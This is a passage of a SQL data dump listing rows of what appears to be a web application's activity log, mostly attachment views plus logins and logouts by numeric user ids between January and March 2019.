23:06:46',NULL),(18458,2,'Attachment',446,'2019-01-17 23:07:01','2019-01-17 23:07:01',NULL),(18459,2,'Attachment',416,'2019-01-17 23:07:01','2019-01-17 23:07:01',NULL),(18460,2,'Attachment',419,'2019-01-17 23:07:01','2019-01-17 23:07:01',NULL),(18461,2,'Attachment',288,'2019-01-17 23:07:01','2019-01-17 23:07:01',NULL),(18462,2,'Attachment',181,'2019-01-17 23:07:01','2019-01-17 23:07:01',NULL),(18463,2,'Attachment',416,'2019-01-18 07:54:04','2019-01-18 07:54:04',NULL),(18464,2,'Attachment',288,'2019-01-18 07:54:04','2019-01-18 07:54:04',NULL),(18465,2,'Attachment',446,'2019-01-18 07:54:04','2019-01-18 07:54:04',NULL),(18466,2,'Attachment',419,'2019-01-18 07:54:04','2019-01-18 07:54:04',NULL),(18467,2,'Attachment',181,'2019-01-18 07:54:04','2019-01-18 07:54:04',NULL),(18468,1,'Login',1,'2019-01-18 07:54:41','2019-01-18 07:54:41',NULL),(18469,2,'Attachment',446,'2019-01-18 08:00:48','2019-01-18 08:00:48',NULL),(18470,2,'Attachment',416,'2019-01-18 08:00:48','2019-01-18 08:00:48',NULL),(18471,2,'Attachment',419,'2019-01-18 08:00:48','2019-01-18 08:00:48',NULL),(18472,2,'Attachment',181,'2019-01-18 08:00:48','2019-01-18 08:00:48',NULL),(18473,2,'Attachment',288,'2019-01-18 08:00:48','2019-01-18 08:00:48',NULL),(18474,2,'Attachment',408,'2019-01-18 08:01:41','2019-01-18 08:01:41',NULL),(18475,2,'Attachment',407,'2019-01-18 08:01:41','2019-01-18 08:01:41',NULL),(18476,2,'Attachment',404,'2019-01-18 08:01:41','2019-01-18 08:01:41',NULL),(18477,2,'Attachment',405,'2019-01-18 08:01:41','2019-01-18 08:01:41',NULL),(18478,2,'Attachment',406,'2019-01-18 08:01:41','2019-01-18 08:01:41',NULL),(18479,2,'Attachment',410,'2019-01-18 08:01:41','2019-01-18 08:01:41',NULL),(18480,2,'Attachment',411,'2019-01-18 08:01:41','2019-01-18 08:01:41',NULL),(18481,2,'Attachment',412,'2019-01-18 08:01:41','2019-01-18 08:01:41',NULL),(18482,2,'Attachment',414,'2019-01-18 08:01:41','2019-01-18 08:01:41',NULL),(18483,2,'Attachment',413,'2019-01-18 08:01:41','2019-01-18 08:01:41',NULL),(18484,2,'Attachment',415,'2019-01-18 08:01:41','2019-01-18 08:01:41',NULL),(18485,2,'Attachment',409,'2019-01-18 08:01:42','2019-01-18 08:01:42',NULL),(18486,2,'Attachment',346,'2019-01-18 08:02:00','2019-01-18 08:02:00',NULL),(18487,2,'Attachment',350,'2019-01-18 08:02:00','2019-01-18 08:02:00',NULL),(18488,2,'Attachment',347,'2019-01-18 08:02:00','2019-01-18 08:02:00',NULL),(18489,2,'Attachment',345,'2019-01-18 08:02:00','2019-01-18 08:02:00',NULL),(18490,2,'Attachment',349,'2019-01-18 08:02:00','2019-01-18 08:02:00',NULL),(18491,2,'Attachment',348,'2019-01-18 08:02:00','2019-01-18 08:02:00',NULL),(18492,2,'Attachment',352,'2019-01-18 08:02:00','2019-01-18 08:02:00',NULL),(18493,2,'Attachment',351,'2019-01-18 08:02:00','2019-01-18 08:02:00',NULL),(18494,2,'Attachment',353,'2019-01-18 08:02:00','2019-01-18 08:02:00',NULL),(18495,2,'Attachment',446,'2019-01-18 08:23:42','2019-01-18 08:23:42',NULL),(18496,2,'Attachment',416,'2019-01-18 08:23:42','2019-01-18 08:23:42',NULL),(18497,2,'Attachment',419,'2019-01-18 08:23:42','2019-01-18 08:23:42',NULL),(18498,2,'Attachment',288,'2019-01-18 08:23:42','2019-01-18 08:23:42',NULL),(18499,2,'Attachment',181,'2019-01-18 08:23:42','2019-01-18 08:23:42',NULL),(18500,2,'Attachment',288,'2019-01-18 08:53:41','2019-01-18 08:53:41',NULL),(18501,2,'Attachment',419,'2019-01-18 08:53:41','2019-01-18 08:53:41',NULL),(18502,2,'Attachment',446,'2019-01-18 08:53:41','2019-01-18 08:53:41',NULL),(18503,2,'Attachment',181,'2019-01-18 08:53:41','2019-01-18 08:53:41',NULL),(18504,2,'Attachment',179,'2019-01-18 09:13:07','2019-01-18 09:13:07',NULL),(18505,2,'Attachment',254,'2019-01-18 09:23:04','2019-01-18 09:23:04',NULL),(18506,2,'Attachment',256,'2019-01-18 09:23:04','2019-01-18 09:23:04',NULL),(18507,2,'Attachment',255,'2019-01-18 09:23:04','2019-01-18 09:23:04',NULL),(18508,2,'Attachment',253,'2019-01-18 09:23:04','2019-01-18 09:23:04',NULL),(18509,20,'Logout',20,'2019-01-18 09:56:35','2019-01-18 09:56:35',NULL),(18510,2,'Attachment',283,'2019-01-18 16:51:03','2019-01-18 16:51:03',NULL),(18511,2,'Attachment',282,'2019-01-18 16:51:03','2019-01-18 16:51:03',NULL),(18512,2,'Attachment',281,'2019-01-18 16:51:03','2019-01-18 16:51:03',NULL),(18513,2,'Attachment',284,'2019-01-18 16:51:03','2019-01-18 16:51:03',NULL),(18514,2,'Attachment',286,'2019-01-18 16:51:03','2019-01-18 16:51:03',NULL),(18515,2,'Attachment',285,'2019-01-18 16:51:03','2019-01-18 16:51:03',NULL),(18516,2,'Attachment',287,'2019-01-18 16:51:03','2019-01-18 16:51:03',NULL),(18517,1,'Login',1,'2019-01-18 16:55:13','2019-01-18 16:55:13',NULL),(18518,2,'Attachment',416,'2019-01-21 07:56:14','2019-01-21 07:56:14',NULL),(18519,2,'Attachment',446,'2019-01-21 07:56:14','2019-01-21 07:56:14',NULL),(18520,2,'Attachment',419,'2019-01-21 07:56:14','2019-01-21 07:56:14',NULL),(18521,2,'Attachment',181,'2019-01-21 07:56:14','2019-01-21 07:56:14',NULL),(18522,2,'Attachment',288,'2019-01-21 07:56:14','2019-01-21 07:56:14',NULL),(18523,2,'Attachment',446,'2019-01-21 07:56:14','2019-01-21 07:56:14',NULL),(18524,2,'Attachment',181,'2019-01-21 07:56:14','2019-01-21 07:56:14',NULL),(18525,2,'Attachment',416,'2019-01-21 07:56:14','2019-01-21 07:56:14',NULL),(18526,2,'Attachment',419,'2019-01-21 07:56:14','2019-01-21 07:56:14',NULL),(18527,2,'Attachment',288,'2019-01-21 07:56:14','2019-01-21 07:56:14',NULL),(18528,2,'Attachment',416,'2019-01-21 08:06:24','2019-01-21 08:06:24',NULL),(18529,2,'Attachment',419,'2019-01-21 08:06:24','2019-01-21 08:06:24',NULL),(18530,2,'Attachment',446,'2019-01-21 08:06:24','2019-01-21 08:06:24',NULL),(18531,2,'Attachment',288,'2019-01-21 08:06:24','2019-01-21 08:06:24',NULL),(18532,2,'Attachment',181,'2019-01-21 08:06:24','2019-01-21 08:06:24',NULL),(18533,2,'Attachment',419,'2019-01-21 08:06:40','2019-01-21 08:06:40',NULL),(18534,2,'Attachment',446,'2019-01-21 08:06:40','2019-01-21 08:06:40',NULL),(18535,2,'Attachment',288,'2019-01-21 08:06:40','2019-01-21 08:06:40',NULL),(18536,2,'Attachment',416,'2019-01-21 08:06:40','2019-01-21 08:06:40',NULL),(18537,2,'Attachment',181,'2019-01-21 08:06:40','2019-01-21 08:06:40',NULL),(18538,1,'Login',1,'2019-01-21 09:48:31','2019-01-21 09:48:31',NULL),(18539,2,'Attachment',446,'2019-01-21 09:48:32','2019-01-21 09:48:32',NULL),(18540,2,'Attachment',416,'2019-01-21 09:48:32','2019-01-21 09:48:32',NULL),(18541,2,'Attachment',288,'2019-01-21 09:48:32','2019-01-21 09:48:32',NULL),(18542,2,'Attachment',181,'2019-01-21 09:48:32','2019-01-21 09:48:32',NULL),(18543,2,'Attachment',419,'2019-01-21 09:48:32','2019-01-21 09:48:32',NULL),(18544,2,'Attachment',446,'2019-01-21 09:48:40','2019-01-21 09:48:40',NULL),(18545,2,'Attachment',416,'2019-01-21 09:48:40','2019-01-21 09:48:40',NULL),(18546,19,'Login',19,'2019-01-21 09:48:45','2019-01-21 09:48:45',NULL),(18547,19,'Attachment',419,'2019-01-21 09:57:01','2019-01-21 09:57:01',NULL),(18548,19,'Attachment',288,'2019-01-21 09:57:01','2019-01-21 09:57:01',NULL),(18549,19,'Attachment',446,'2019-01-21 09:57:01','2019-01-21 09:57:01',NULL),(18550,19,'Attachment',416,'2019-01-21 09:57:01','2019-01-21 09:57:01',NULL),(18551,19,'Attachment',181,'2019-01-21 09:57:01','2019-01-21 09:57:01',NULL),(18552,2,'Attachment',446,'2019-01-21 11:01:31','2019-01-21 11:01:31',NULL),(18553,2,'Attachment',419,'2019-01-21 11:01:31','2019-01-21 11:01:31',NULL),(18554,2,'Attachment',416,'2019-01-21 11:01:31','2019-01-21 11:01:31',NULL),(18555,2,'Attachment',288,'2019-01-21 11:01:31','2019-01-21 11:01:31',NULL),(18556,2,'Attachment',181,'2019-01-21 11:01:31','2019-01-21 11:01:31',NULL),(18557,1,'Login',1,'2019-01-21 11:02:22','2019-01-21 11:02:22',NULL),(18558,19,'Logout',19,'2019-01-21 14:19:37','2019-01-21 14:19:37',NULL),(18559,2,'Attachment',446,'2019-01-21 14:19:37','2019-01-21 14:19:37',NULL),(18560,2,'Attachment',416,'2019-01-21 14:19:38','2019-01-21 14:19:38',NULL),(18561,2,'Attachment',181,'2019-01-21 14:19:38','2019-01-21 14:19:38',NULL),(18562,2,'Attachment',288,'2019-01-21 14:19:38','2019-01-21 14:19:38',NULL),(18563,2,'Attachment',419,'2019-01-21 14:19:38','2019-01-21 14:19:38',NULL),(18564,1,'Login',1,'2019-01-21 14:19:41','2019-01-21 14:19:41',NULL),(18565,2,'Attachment',446,'2019-01-21 14:21:28','2019-01-21 14:21:28',NULL),(18566,2,'Attachment',419,'2019-01-21 14:21:28','2019-01-21 14:21:28',NULL),(18567,2,'Attachment',416,'2019-01-21 14:21:28','2019-01-21 14:21:28',NULL),(18568,2,'Attachment',288,'2019-01-21 14:21:28','2019-01-21 14:21:28',NULL),(18569,2,'Attachment',181,'2019-01-21 14:21:28','2019-01-21 14:21:28',NULL),(18570,2,'Attachment',446,'2019-01-21 15:19:05','2019-01-21 15:19:05',NULL),(18571,2,'Attachment',419,'2019-01-21 15:19:06','2019-01-21 15:19:06',NULL),(18572,2,'Attachment',416,'2019-01-21 15:19:06','2019-01-21 15:19:06',NULL),(18573,2,'Attachment',288,'2019-01-21 15:19:06','2019-01-21 15:19:06',NULL),(18574,2,'Attachment',181,'2019-01-21 15:19:06','2019-01-21 15:19:06',NULL),(18575,1,'Login',1,'2019-01-21 15:19:45','2019-01-21 15:19:45',NULL),(18576,1,'Logout',1,'2019-01-21 15:29:53','2019-01-21 15:29:53',NULL),(18577,1,'Login',1,'2019-01-21 15:29:58','2019-01-21 15:29:58',NULL),(18578,1,'Attachment',405,'2019-01-21 17:05:32','2019-01-21 17:05:32',NULL),(18579,1,'Attachment',404,'2019-01-21 17:05:32','2019-01-21 17:05:32',NULL),(18580,1,'Attachment',408,'2019-01-21 17:05:32','2019-01-21 17:05:32',NULL),(18581,1,'Attachment',409,'2019-01-21 17:05:32','2019-01-21 17:05:32',NULL),(18582,1,'Attachment',406,'2019-01-21 17:05:32','2019-01-21 17:05:32',NULL),(18583,1,'Attachment',407,'2019-01-21 17:05:32','2019-01-21 17:05:32',NULL),(18584,1,'Attachment',410,'2019-01-21 17:05:32','2019-01-21 17:05:32',NULL),(18585,1,'Attachment',411,'2019-01-21 17:05:32','2019-01-21 17:05:32',NULL),(18586,1,'Attachment',412,'2019-01-21 17:05:32','2019-01-21 17:05:32',NULL),(18587,1,'Attachment',413,'2019-01-21 17:05:32','2019-01-21 17:05:32',NULL),(18588,1,'Attachment',414,'2019-01-21 17:05:32','2019-01-21 17:05:32',NULL),(18589,1,'Attachment',415,'2019-01-21 17:05:32','2019-01-21 17:05:32',NULL),(18590,1,'Attachment',416,'2019-01-21 17:05:51','2019-01-21 17:05:51',NULL),(18591,2,'Attachment',446,'2019-01-21 17:26:31','2019-01-21 17:26:31',NULL),(18592,2,'Attachment',419,'2019-01-21 17:26:31','2019-01-21 17:26:31',NULL),(18593,2,'Attachment',181,'2019-01-21 17:26:32','2019-01-21 17:26:32',NULL),(18594,2,'Attachment',416,'2019-01-21 17:26:32','2019-01-21 17:26:32',NULL),(18595,2,'Attachment',288,'2019-01-21 17:26:32','2019-01-21 17:26:32',NULL),(18596,2,'Attachment',446,'2019-01-21 17:27:06','2019-01-21 17:27:06',NULL),(18597,2,'Attachment',416,'2019-01-21 17:27:07','2019-01-21 17:27:07',NULL),(18598,2,'Attachment',419,'2019-01-21 17:27:07','2019-01-21 17:27:07',NULL),(18599,2,'Attachment',181,'2019-01-21 17:27:07','2019-01-21 17:27:07',NULL),(18600,2,'Attachment',288,'2019-01-21 17:27:07','2019-01-21 17:27:07',NULL),(18601,1,'Login',1,'2019-01-21 17:27:23','2019-01-21 17:27:23',NULL),(18602,1,'Logout',1,'2019-01-21 22:49:23','2019-01-21 22:49:23',NULL),(18603,1,'Login',1,'2019-01-21 22:49:42','2019-01-21 22:49:42',NULL),(18604,1,'Logout',1,'2019-01-21 22:52:07','2019-01-21 22:52:07',NULL),(18605,1,'Login',1,'2019-01-21 22:52:33','2019-01-21 22:52:33',NULL),(18606,1,'Login',1,'2019-01-21 22:54:29','2019-01-21 22:54:29',NULL),(18607,1,'Login',1,'2019-01-21 22:58:33','2019-01-21 22:58:33',NULL),(18608,2,'Attachment',416,'2019-01-21 23:09:35','2019-01-21 23:09:35',NULL),(18609,2,'Attachment',446,'2019-01-21 23:09:35','2019-01-21 23:09:35',NULL),(18610,2,'Attachment',419,'2019-01-21 23:09:35','2019-01-21 23:09:35',NULL),(18611,2,'Attachment',288,'2019-01-21 23:09:35','2019-01-21 23:09:35',NULL),(18612,2,'Attachment',181,'2019-01-21 23:09:35','2019-01-21 23:09:35',NULL),(18613,6,'Login',6,'2019-01-21 23:10:02','2019-01-21 23:10:02',NULL),(18614,6,'Logout',6,'2019-01-21 23:16:58','2019-01-21 23:16:58',NULL),(18615,6,'Login',6,'2019-01-21 23:18:31','2019-01-21 23:18:31',NULL),(18616,2,'Attachment',446,'2019-01-23 10:23:49','2019-01-23 10:23:49',NULL),(18617,2,'Attachment',416,'2019-01-23 10:23:49','2019-01-23 10:23:49',NULL),(18618,2,'Attachment',419,'2019-01-23 10:23:49','2019-01-23 10:23:49',NULL),(18619,2,'Attachment',288,'2019-01-23 10:23:49','2019-01-23 10:23:49',NULL),(18620,2,'Attachment',181,'2019-01-23 10:23:49','2019-01-23 10:23:49',NULL),(18621,1,'Login',1,'2019-01-23 10:24:14','2019-01-23 10:24:14',NULL),(18622,2,'Attachment',181,'2019-01-25 08:06:38','2019-01-25 08:06:38',NULL),(18623,2,'Attachment',288,'2019-01-25 08:06:38','2019-01-25 08:06:38',NULL),(18624,2,'Attachment',446,'2019-01-25 08:06:38','2019-01-25 08:06:38',NULL),(18625,2,'Attachment',419,'2019-01-25 08:06:38','2019-01-25 08:06:38',NULL),(18626,2,'Attachment',416,'2019-01-25 08:06:38','2019-01-25 08:06:38',NULL),(18627,1,'Login',1,'2019-01-25 08:07:03','2019-01-25 08:07:03',NULL),(18628,1,'Login',1,'2019-01-25 08:08:37','2019-01-25 08:08:37',NULL),(18629,2,'Attachment',446,'2019-01-25 10:31:04','2019-01-25 10:31:04',NULL),(18630,2,'Attachment',416,'2019-01-25 10:31:05','2019-01-25 10:31:05',NULL),(18631,2,'Attachment',419,'2019-01-25 10:31:05','2019-01-25 10:31:05',NULL),(18632,2,'Attachment',288,'2019-01-25 10:31:05','2019-01-25 10:31:05',NULL),(18633,2,'Attachment',181,'2019-01-25 10:31:05','2019-01-25 10:31:05',NULL),(18634,2,'Attachment',446,'2019-01-25 11:13:17','2019-01-25 11:13:17',NULL),(18635,2,'Attachment',446,'2019-01-25 11:13:17','2019-01-25 11:13:17',NULL),(18636,2,'Attachment',419,'2019-01-25 11:13:17','2019-01-25 11:13:17',NULL),(18637,2,'Attachment',419,'2019-01-25 11:13:17','2019-01-25 11:13:17',NULL),(18638,2,'Attachment',288,'2019-01-25 11:13:17','2019-01-25 11:13:17',NULL),(18639,2,'Attachment',181,'2019-01-25 11:13:17','2019-01-25 11:13:17',NULL),(18640,2,'Attachment',288,'2019-01-25 11:13:17','2019-01-25 11:13:17',NULL),(18641,2,'Attachment',181,'2019-01-25 11:13:17','2019-01-25 11:13:17',NULL),(18642,2,'Attachment',416,'2019-01-25 11:13:17','2019-01-25 11:13:17',NULL),(18643,2,'Attachment',416,'2019-01-25 11:13:18','2019-01-25 11:13:18',NULL),(18644,2,'Attachment',446,'2019-01-25 11:13:22','2019-01-25 11:13:22',NULL),(18645,2,'Attachment',416,'2019-01-25 11:13:22','2019-01-25 11:13:22',NULL),(18646,2,'Attachment',419,'2019-01-25 11:13:22','2019-01-25 11:13:22',NULL),(18647,2,'Attachment',288,'2019-01-25 11:13:22','2019-01-25 11:13:22',NULL),(18648,2,'Attachment',181,'2019-01-25 11:13:22','2019-01-25 11:13:22',NULL),(18649,2,'Attachment',446,'2019-01-25 11:14:45','2019-01-25 11:14:45',NULL),(18650,2,'Attachment',416,'2019-01-25 11:14:45','2019-01-25 11:14:45',NULL),(18651,2,'Attachment',419,'2019-01-25 11:14:45','2019-01-25 11:14:45',NULL),(18652,2,'Attachment',288,'2019-01-25 11:14:45','2019-01-25 11:14:45',NULL),(18653,2,'Attachment',181,'2019-01-25 11:14:45','2019-01-25 11:14:45',NULL),(18654,1,'Login',1,'2019-01-25 11:36:13','2019-01-25 11:36:13',NULL),(18655,1,'Logout',1,'2019-01-25 11:47:18','2019-01-25 11:47:18',NULL),(18656,21,'Login',21,'2019-01-25 11:47:33','2019-01-25 11:47:33',NULL),(18657,21,'Logout',21,'2019-01-25 11:47:51','2019-01-25 11:47:51',NULL),(18658,22,'Login',22,'2019-01-25 11:48:00','2019-01-25 11:48:00',NULL),(18659,22,'Logout',22,'2019-01-25 11:48:15','2019-01-25 11:48:15',NULL),(18660,1,'Login',1,'2019-01-25 11:48:19','2019-01-25 11:48:19',NULL),(18661,1,'Logout',1,'2019-01-25 11:49:55','2019-01-25 11:49:55',NULL),(18662,1,'Login',1,'2019-01-25 11:50:46','2019-01-25 11:50:46',NULL),(18663,1,'Login',1,'2019-01-25 11:51:17','2019-01-25 11:51:17',NULL),(18664,1,'Logout',1,'2019-01-25 11:55:19','2019-01-25 11:55:19',NULL),(18665,1,'Login',1,'2019-01-25 12:09:49','2019-01-25 12:09:49',NULL),(18666,1,'Logout',1,'2019-01-25 12:11:03','2019-01-25 12:11:03',NULL),(18667,1,'Login',1,'2019-01-25 12:11:09','2019-01-25 12:11:09',NULL),(18668,1,'Login',1,'2019-01-25 12:12:37','2019-01-25 12:12:37',NULL),(18669,1,'Attachment',446,'2019-01-25 12:13:30','2019-01-25 12:13:30',NULL),(18670,1,'Attachment',416,'2019-01-25 12:13:30','2019-01-25 12:13:30',NULL),(18671,1,'Attachment',419,'2019-01-25 12:13:30','2019-01-25 12:13:30',NULL),(18672,1,'Attachment',288,'2019-01-25 12:13:32','2019-01-25 12:13:32',NULL),(18673,1,'Attachment',181,'2019-01-25 12:13:32','2019-01-25 12:13:32',NULL),(18674,1,'Attachment',446,'2019-01-25 12:13:44','2019-01-25 12:13:44',NULL),(18675,1,'Attachment',416,'2019-01-25 12:13:44','2019-01-25 12:13:44',NULL),(18676,1,'Attachment',419,'2019-01-25 12:13:44','2019-01-25 12:13:44',NULL),(18677,1,'Logout',1,'2019-01-25 12:13:50','2019-01-25 12:13:50',NULL),(18678,2,'Attachment',446,'2019-01-25 12:13:50','2019-01-25 12:13:50',NULL),(18679,2,'Attachment',416,'2019-01-25 12:13:50','2019-01-25 12:13:50',NULL),(18680,2,'Attachment',446,'2019-01-25 12:13:56','2019-01-25 12:13:56',NULL),(18681,2,'Attachment',419,'2019-01-25 12:13:56','2019-01-25 12:13:56',NULL),(18682,2,'Attachment',416,'2019-01-25 12:13:56','2019-01-25 12:13:56',NULL),(18683,1,'Login',1,'2019-01-25 12:14:04','2019-01-25 12:14:04',NULL),(18684,1,'Logout',1,'2019-01-25 12:28:14','2019-01-25 12:28:14',NULL),(18685,1,'Login',1,'2019-01-25 12:28:26','2019-01-25 12:28:26',NULL),(18686,1,'Login',1,'2019-01-25 12:28:29','2019-01-25 12:28:29',NULL),(18687,1,'Logout',1,'2019-01-25 12:29:49','2019-01-25 12:29:49',NULL),(18688,1,'Login',1,'2019-01-25 12:30:56','2019-01-25 12:30:56',NULL),(18689,1,'Logout',1,'2019-01-25 12:31:00','2019-01-25 12:31:00',NULL),(18690,2,'Attachment',446,'2019-01-25 12:31:01','2019-01-25 12:31:01',NULL),(18691,2,'Attachment',416,'2019-01-25 12:31:01','2019-01-25 12:31:01',NULL),(18692,2,'Attachment',419,'2019-01-25 12:31:01','2019-01-25 12:31:01',NULL),(18693,2,'Attachment',288,'2019-01-25 12:31:01','2019-01-25 12:31:01',NULL),(18694,2,'Attachment',181,'2019-01-25 12:31:01','2019-01-25 12:31:01',NULL),(18695,1,'Login',1,'2019-01-25 12:31:04','2019-01-25 12:31:04',NULL),(18696,1,'Logout',1,'2019-01-25 12:31:36','2019-01-25 12:31:36',NULL),(18697,2,'Attachment',446,'2019-01-25 12:31:36','2019-01-25 12:31:36',NULL),(18698,2,'Attachment',416,'2019-01-25 12:31:36','2019-01-25 12:31:36',NULL),(18699,2,'Attachment',419,'2019-01-25 12:31:36','2019-01-25 12:31:36',NULL),(18700,2,'Attachment',288,'2019-01-25 12:31:36','2019-01-25 12:31:36',NULL),(18701,2,'Attachment',181,'2019-01-25 12:31:36','2019-01-25 12:31:36',NULL),(18702,1,'Login',1,'2019-01-25 12:31:41','2019-01-25 12:31:41',NULL),(18703,1,'Logout',1,'2019-01-25 12:34:11','2019-01-25 12:34:11',NULL),(18704,1,'Login',1,'2019-01-25 14:01:48','2019-01-25 14:01:48',NULL),(18705,1,'Login',1,'2019-01-29 14:27:53','2019-01-29 14:27:53',NULL),(18706,2,'Attachment',446,'2019-01-29 15:20:52','2019-01-29 15:20:52',NULL),(18707,2,'Attachment',416,'2019-01-29 15:20:52','2019-01-29 15:20:52',NULL),(18708,2,'Attachment',419,'2019-01-29 15:20:52','2019-01-29 15:20:52',NULL),(18709,2,'Attachment',288,'2019-01-29 15:20:52','2019-01-29 15:20:52',NULL),(18710,2,'Attachment',181,'2019-01-29 15:20:52','2019-01-29 15:20:52',NULL),(18711,22,'Login',22,'2019-01-29 15:23:16','2019-01-29 15:23:16',NULL),(18712,2,'Attachment',446,'2019-01-29 23:25:54','2019-01-29 23:25:54',NULL),(18713,2,'Attachment',416,'2019-01-29 23:25:55','2019-01-29 23:25:55',NULL),(18714,2,'Attachment',419,'2019-01-29 23:25:55','2019-01-29 23:25:55',NULL),(18715,2,'Attachment',288,'2019-01-29 23:25:55','2019-01-29 23:25:55',NULL),(18716,2,'Attachment',181,'2019-01-29 23:25:55','2019-01-29 23:25:55',NULL),(18717,1,'Login',1,'2019-01-29 23:26:31','2019-01-29 23:26:31',NULL),(18718,2,'Attachment',446,'2019-01-31 15:17:18','2019-01-31 15:17:18',NULL),(18719,2,'Attachment',288,'2019-01-31 15:17:18','2019-01-31 15:17:18',NULL),(18720,2,'Attachment',416,'2019-01-31 15:17:18','2019-01-31 15:17:18',NULL),(18721,2,'Attachment',181,'2019-01-31 15:17:18','2019-01-31 15:17:18',NULL),(18722,2,'Attachment',419,'2019-01-31 15:17:18','2019-01-31 15:17:18',NULL),(18723,1,'Login',1,'2019-01-31 15:17:23','2019-01-31 15:17:23',NULL),(18724,2,'Attachment',416,'2019-02-17 22:20:03','2019-02-17 22:20:03',NULL),(18725,2,'Attachment',288,'2019-02-17 22:20:03','2019-02-17 22:20:03',NULL),(18726,2,'Attachment',446,'2019-02-17 22:20:03','2019-02-17 22:20:03',NULL),(18727,2,'Attachment',181,'2019-02-17 22:20:03','2019-02-17 22:20:03',NULL),(18728,2,'Attachment',419,'2019-02-17 22:20:03','2019-02-17 22:20:03',NULL),(18729,1,'Login',1,'2019-02-17 22:23:29','2019-02-17 22:23:29',NULL),(18730,2,'Attachment',288,'2019-02-20 11:15:01','2019-02-20 11:15:01',NULL),(18731,2,'Attachment',446,'2019-02-20 11:15:01','2019-02-20 11:15:01',NULL),(18732,2,'Attachment',419,'2019-02-20 11:15:01','2019-02-20 11:15:01',NULL),(18733,2,'Attachment',181,'2019-02-20 11:15:01','2019-02-20 11:15:01',NULL),(18734,2,'Attachment',416,'2019-02-20 11:15:01','2019-02-20 11:15:01',NULL),(18735,2,'Attachment',446,'2019-02-20 20:59:35','2019-02-20 20:59:35',NULL),(18736,2,'Attachment',416,'2019-02-20 20:59:35','2019-02-20 20:59:35',NULL),(18737,2,'Attachment',288,'2019-02-20 20:59:35','2019-02-20 20:59:35',NULL),(18738,2,'Attachment',419,'2019-02-20 20:59:35','2019-02-20 20:59:35',NULL),(18739,2,'Attachment',181,'2019-02-20 20:59:35','2019-02-20 20:59:35',NULL),(18740,22,'Login',22,'2019-02-20 21:00:29','2019-02-20 21:00:29',NULL),(18741,22,'Logout',22,'2019-02-20 21:05:11','2019-02-20 21:05:11',NULL),(18742,30,'Login',30,'2019-02-20 21:05:48','2019-02-20 21:05:48',NULL),(18743,30,'Logout',30,'2019-02-20 21:08:32','2019-02-20 21:08:32',NULL),(18744,2,'Attachment',446,'2019-02-21 11:17:07','2019-02-21 11:17:07',NULL),(18745,2,'Attachment',419,'2019-02-21 11:17:07','2019-02-21 11:17:07',NULL),(18746,2,'Attachment',416,'2019-02-21 11:17:07','2019-02-21 11:17:07',NULL),(18747,2,'Attachment',288,'2019-02-21 11:17:07','2019-02-21 11:17:07',NULL),(18748,2,'Attachment',181,'2019-02-21 11:17:07','2019-02-21 11:17:07',NULL),(18749,30,'Login',30,'2019-02-21 11:17:55','2019-02-21 11:17:55',NULL),(18750,2,'Attachment',446,'2019-02-22 12:32:02','2019-02-22 12:32:02',NULL),(18751,2,'Attachment',288,'2019-02-22 12:32:02','2019-02-22 12:32:02',NULL),(18752,2,'Attachment',416,'2019-02-22 12:32:02','2019-02-22 12:32:02',NULL),(18753,2,'Attachment',181,'2019-02-22 12:32:02','2019-02-22 12:32:02',NULL),(18754,2,'Attachment',419,'2019-02-22 12:32:03','2019-02-22 12:32:03',NULL),(18755,2,'Attachment',419,'2019-02-23 18:37:15','2019-02-23 18:37:15',NULL),(18756,2,'Attachment',446,'2019-02-23 18:37:15','2019-02-23 18:37:15',NULL),(18757,2,'Attachment',416,'2019-02-23 18:37:16','2019-02-23 18:37:16',NULL),(18758,2,'Attachment',288,'2019-02-23 18:37:16','2019-02-23 18:37:16',NULL),(18759,2,'Attachment',181,'2019-02-23 18:37:16','2019-02-23 18:37:16',NULL),(18760,1,'Login',1,'2019-02-23 18:37:36','2019-02-23 18:37:36',NULL),(18761,2,'Attachment',446,'2019-02-27 08:42:45','2019-02-27 08:42:45',NULL),(18762,2,'Attachment',419,'2019-02-27 08:42:45','2019-02-27 08:42:45',NULL),(18763,2,'Attachment',181,'2019-02-27 08:42:45','2019-02-27 08:42:45',NULL),(18764,2,'Attachment',288,'2019-02-27 08:42:45','2019-02-27 08:42:45',NULL),(18765,2,'Attachment',416,'2019-02-27 08:42:45','2019-02-27 08:42:45',NULL),(18766,1,'Login',1,'2019-02-27 08:43:02','2019-02-27 08:43:02',NULL),(18767,2,'Attachment',446,'2019-03-03 12:51:15','2019-03-03 12:51:15',NULL),(18768,2,'Attachment',416,'2019-03-03 12:51:16','2019-03-03 12:51:16',NULL),(18769,2,'Attachment',288,'2019-03-03 12:51:16','2019-03-03 12:51:16',NULL),(18770,2,'Attachment',181,'2019-03-03 12:51:16','2019-03-03 12:51:16',NULL),(18771,2,'Attachment',419,'2019-03-03 12:51:16','2019-03-03 12:51:16',NULL),(18772,2,'Attachment',446,'2019-03-04 09:58:04','2019-03-04 09:58:04',NULL),(18773,2,'Attachment',416,'2019-03-04 09:58:04','2019-03-04 09:58:04',NULL),(18774,2,'Attachment',419,'2019-03-04 09:58:04','2019-03-04 09:58:04',NULL),(18775,2,'Attachment',181,'2019-03-04 09:58:04','2019-03-04 09:58:04',NULL),(18776,2,'Attachment',288,'2019-03-04 09:58:04','2019-03-04 09:58:04',NULL),(18777,28,'Login',28,'2019-03-04 09:58:51','2019-03-04 09:58:51',NULL),(18778,28,'Logout',28,'2019-03-04 11:24:00','2019-03-04 11:24:00',NULL),(18779,26,'Login',26,'2019-03-04 11:24:48','2019-03-04 11:24:48',NULL),(18780,2,'Attachment',446,'2019-03-04 13:38:06','2019-03-04 13:38:06',NULL),(18781,2,'Attachment',416,'2019-03-04 13:38:06','2019-03-04 13:38:06',NULL),(18782,2,'Attachment',419,'2019-03-04 13:38:06','2019-03-04 13:38:06',NULL),(18783,2,'Attachment',288,'2019-03-04 13:38:06','2019-03-04 13:38:06',NULL),(18784,2,'Attachment',181,'2019-03-04 13:38:06','2019-03-04 13:38:06',NULL),(18785,26,'Logout',26,'2019-03-04 13:47:15','2019-03-04 13:47:15',NULL),(18786,26,'Login',26,'2019-03-04 14:05:24','2019-03-04 14:05:24',NULL),(18787,26,'Logout',26,'2019-03-04 14:09:48','2019-03-04 14:09:48',NULL),(18788,22,'Login',22,'2019-03-04 14:10:08','2019-03-04 14:10:08',NULL),(18789,22,'Attachment',179,'2019-03-04 14:38:38','2019-03-04 14:38:38',NULL),(18790,2,'Attachment',181,'2019-03-04 14:39:47','2019-03-04 14:39:47',NULL),(18791,2,'Attachment',416,'2019-03-04 14:39:47','2019-03-04 14:39:47',NULL),(18792,2,'Attachment',446,'2019-03-04 14:39:47','2019-03-04 14:39:47',NULL),(18793,2,'Attachment',288,'2019-03-04 